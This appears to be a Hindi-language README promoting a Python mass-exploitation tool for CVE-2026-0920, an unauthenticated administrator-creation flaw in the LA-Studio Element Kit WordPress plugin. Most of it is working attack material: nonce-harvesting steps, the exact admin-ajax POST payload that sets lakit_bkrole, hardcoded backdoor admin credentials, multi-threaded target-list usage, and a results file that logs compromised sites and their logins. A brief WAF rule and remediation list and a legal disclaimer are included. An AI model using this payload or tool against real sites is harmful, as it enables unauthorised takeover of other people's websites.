
LA-Studio Element Kit for Elementor <= 1.5.6.3 - lakit_bkrole पैरामीटर के माध्यम से बैकडोर द्वारा प्रशासनिक उपयोगकर्ता निर्माण हेतु बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
LA-Studio Element Kit for Elementor <= 1.5.6.3 - lakit_bkrole पैरामीटर के माध्यम से प्रशासनिक उपयोगकर्ता निर्माण हेतु बैकडोर द्वारा बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
_____ _____ ___ __ ___ __ __ ___ ___ __
/ __\ \ / / __|_|_ ) \_ )/ / ___ / \/ _ \_ ) \
| (__ \ V /| _|___/ / / () / // _ \___| () \_, // / () |
\___| \_/ |___| /___\__/___\___/ \__/ /_//___\__/
📡 एक्सप्लॉइट सबसे पहले यहीं जारी होता है। टेलीग्राम पर @KNxploited को फॉलो करें — नए खुलासा हुए CVE, कार्यशील PoC और सटीक सुरक्षा अनुसंधान के लिए आपका विशेष फ़ीड। लगातार अपडेट। उनके लिए बनाया गया है जो आगे रहते हैं।
CVE-2026-0920 एक CVSS 9.8 क्रिटिकल भेद्यता है जो LA-Studio Element Kit for Elementor WordPress प्लगइन में खोजी गई है।
यह दोष ajax_register_handle() फ़ंक्शन में स्थित है, जो AJAX के माध्यम से बिना प्रमाणीकरण के उपयोगकर्ता पंजीकरण को संसाधित करता है। यह फ़ंक्शन lakit_bkrole पैरामीटर पर किसी भी प्रतिबंध को लागू करने में विफल रहता है — जिससे पूरी तरह से बिना प्रमाणीकरण वाला हमलावर पंजीकरण के दौरान administrator भूमिका स्वयं-निर्धारित कर सकता है, और एक ही अनुरोध में पूर्ण WordPress एडमिन अधिग्रहण प्राप्त कर सकता है।
मूल कारण प्लगइन के AJAX पंजीकरण हैंडलर में भूमिका क्षमता जांच की कमी है:
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);
public function ajax_register_handle() {
$actions = json_decode(stripslashes($_POST['actions']), true);
foreach ($actions as $req) {
if ($req['action'] === 'register') {
$data = $req['data'];
$user_data = [
'user_login' => $data['username'],
'user_pass' => $data['password'],
'user_email' => $data['email'],
'role' => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
];
// No validation of $data['lakit_bkrole'] against allowed roles
wp_insert_user($user_data); // Administrator created silently
}
}
}
यह क्रिटिकल क्यों है:
wp_ajax_nopriv_* = बिना किसी प्रमाणीकरण के किसी भी व्यक्ति के लिए सुलभlakit_bkrole किसी भी WordPress भूमिका स्ट्रिंग को स्वीकार करता है — जिसमें administrator भी शामिल हैStep 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)
Search HTML/JS for:
"ajaxNonce": "<value>" ← Inline JSON config
ajaxNonce: '<value>' ← JS variable
data-ajaxnonce="<value>" ← HTML attribute
Nonce is publicly accessible — no login required.
↓
ajaxNonce extracted ✔️
──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = lakit_ajax
_nonce = <extracted nonce>
actions = {
"req1": {
"action": "register",
"data": {
"email": "[email protected]",
"password": "adminSA",
"username": "Nx_admin",
"lakit_field_log": "yes", ← use supplied username
"lakit_field_pwd": "yes", ← use supplied password
"lakit_field_cpwd": "no", ← skip password confirm
"lakit_bkrole": "1", ← trigger admin role injection
"lakit_recaptcha_response": ""
}
}
}
↓
Administrator account silently created ✔️
──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
log = Nx_admin
pwd = adminSA
↓
Session cookies obtained → GET /wp-admin/plugin-install.php
↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
pip install requests colorama
| निर्भरता | उद्देश्य |
|---|---|
requests | HTTP अनुरोध, सत्र प्रबंधन, कुकी प्रबंधन |
colorama | सभी प्लेटफॉर्मों पर रंगीन टर्मिनल आउटपुट |
Python 3.10+ अनुशंसित (
str | Noneयूनियन टाइप हिंट का उपयोग करता है)।
CVE-2026-0920/
├── CVE-2026-0920.py # Main exploit script
├── list.txt # Target URLs — one per line
├── success_results.txt # Auto-generated: pwned targets + credentials
CVE-2026-0920.py खोलें और अपने इच्छित एडमिन खाता विवरण सेट करने के लिए शीर्ष पर मौजूद कॉन्स्टेंट संपादित करें:
ADMIN_EMAIL = "[email protected]" # Email for the new admin account
ADMIN_PASSWORD = "adminSA" # Password for the new admin account
ADMIN_USERNAME = "Nx_admin" # Username for the new admin account
प्रत्येक पंक्ति में एक टार्गेट URL के साथ list.txt बनाएं:
https://target1.com
https://target2.com
http://target3.com
बिना स्कीम वाले URLs को स्वचालित रूप से
https://उपसर्ग दिया जाता है।
python CVE-2026-0920.py
आपको संकेत दिया जाएगा:
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50): 20
स्क्रिप्ट रीयल-टाइम, रंग-कोडित टर्मिनल आउटपुट उत्पन्न करती है:
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK
============================================================
[ SUCCESS BLOCK ]
Site : https://target.com
Result : SUCCESS
AJAX OK : YES
FULL ADMIN : YES (login + plugin install access)
============================================================
| रंग | अर्थ |
|---|---|
सफल एक्सप्लॉइट success_results.txt में लिखे जाते हैं:
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3
प्रत्येक पंक्ति में पूरी जानकारी होती है: टार्गेट, क्रेडेंशियल, लॉगिन स्थिति, AJAX प्रतिक्रिया स्थिति और उपयोग किया गया nonce।
स्क्रिप्ट झूठी सकारात्मक (false positives) को समाप्त करने के लिए दो-चरणीय सत्यापन करती है:
Stage 1 — AJAX Response Analysis
Checks for success markers in the JSON response:
• "created successfully"
• "success":true
• "type":"success"
• "status":"success"
Stage 2 — Real Login + Plugin Install Access Test
1. POST /wp-login.php with injected credentials
2. GET /wp-admin/plugin-install.php
3. Confirm 200 response + plugin upload form present
4. Confirm no redirect back to wp-login.php
Only BOTH stages passing = TRUE SUCCESS reported
यह उन साइटों के कारण होने वाले झूठे सकारात्मक परिणामों को समाप्त करता है जो AJAX पर 200 OK लौटाती हैं लेकिन पंजीकरण को चुपचाप विफल कर देती हैं।
यह एक्सप्लॉइट यह विशिष्ट नेटवर्क पैटर्न उत्पन्न करता है — डिफेंडरों और WAF लेखकों के लिए:
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}
WAF / IDS नियम (स्यूडोकोड):
IF request.method == POST
AND request.path == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "lakit_ajax"
AND request.body CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)
यदि आप साइट स्वामी, डेवलपर या डिफेंडर हैं, तो तुरंत कार्य करें:
lakit_bkrole युक्त admin-ajax.php के लिए बिना प्रमाणीकरण के POST अनुरोधlakit_ajax AJAX एक्शन कॉल के लिए सर्वर और WordPress गतिविधि लॉगTHIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.
By downloading, executing, or modifying this script, you explicitly agree:
• You hold EXPLICIT, WRITTEN authorization from the owner of every
target system you test. No exceptions. No grey areas.
• You are operating within a formally scoped, authorized penetration
testing engagement or a controlled lab environment.
• You will NOT use this tool against any system, network, or
infrastructure without documented legal permission.
• Nxploited and all contributors bear ZERO liability for unauthorized
use, data loss, system damage, legal proceedings, or criminal
prosecution arising from the use of this tool.
Unauthorized use of this exploit constitutes a criminal offense under:
— Computer Fraud and Abuse Act (CFAA), USA
— Computer Misuse Act (CMA), UK
— EU Directive 2013/40/EU on Attacks Against Information Systems
— Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
— And all equivalent national and international cybercrime legislation.
USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
| हैंडल | Nxploited |
| टेलीग्राम | @KNxploited |
| गिटहब | github.com/Nxploited |
🔔 टेलीग्राम पर @KNxploited को फॉलो करें नए CVE। कार्यशील एक्सप्लॉइट। गहन भेद्यता अनुसंधान। जानने वाले पहले। कार्य करने वाले पहले। अंतिम न बनें।
| फ़ील्ड | विवरण |
|---|
| CVE ID | CVE-2026-0920 |
| प्लगइन | LA-Studio Element Kit for Elementor |
| स्लग | lakit / la-studio-element-kit-for-elementor |
| प्रभावित संस्करण | 1.5.6.3 तक के सभी संस्करण |
| भेद्यता प्रकार | बिना प्रमाणीकरण के विशेषाधिकार वृद्धि / एडमिन निर्माण |
| हमला वेक्टर | नेटवर्क — कोई प्रमाणीकरण आवश्यक नहीं |
| CVSS 3.1 स्कोर | 9.8 क्रिटिकल |
| CVSS वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| प्रभाव | पूर्ण WordPress प्रशासक अधिग्रहण |
| शोधकर्ता | Nxploited |
threading | समवर्ती मल्टी-टार्गेट प्रोसेसिंग |
re | HTML/JS से रेगेक्स-आधारित nonce निष्कर्षण |
🔵 सियान [*] |
| सूचनात्मक — चरण प्रगति पर है |
🟢 हरा [+] | सकारात्मक संकेत — आंशिक या पूर्ण सफलता |
🟡 पीला [!] | चेतावनी — अस्पष्ट परिणाम, समीक्षा आवश्यक |
🔴 लाल [-] | विफलता — टार्गेट शोषण योग्य नहीं या त्रुटि |
| पैरामीटर | डिफ़ॉल्ट | विवरण |
|---|
| टार्गेट फ़ाइल | list.txt | टार्गेट URLs वाली फ़ाइल |
| थ्रेड्स | 10 (अधिकतम: 50) | समवर्ती वर्कर्स |
ADMIN_EMAIL | [email protected] | इंजेक्टेड एडमिन खाते के लिए ईमेल |
ADMIN_PASSWORD | adminSA | इंजेक्टेड एडमिन खाते के लिए पासवर्ड |
ADMIN_USERNAME | Nx_admin | इंजेक्टेड एडमिन खाते के लिए उपयोगकर्ता नाम |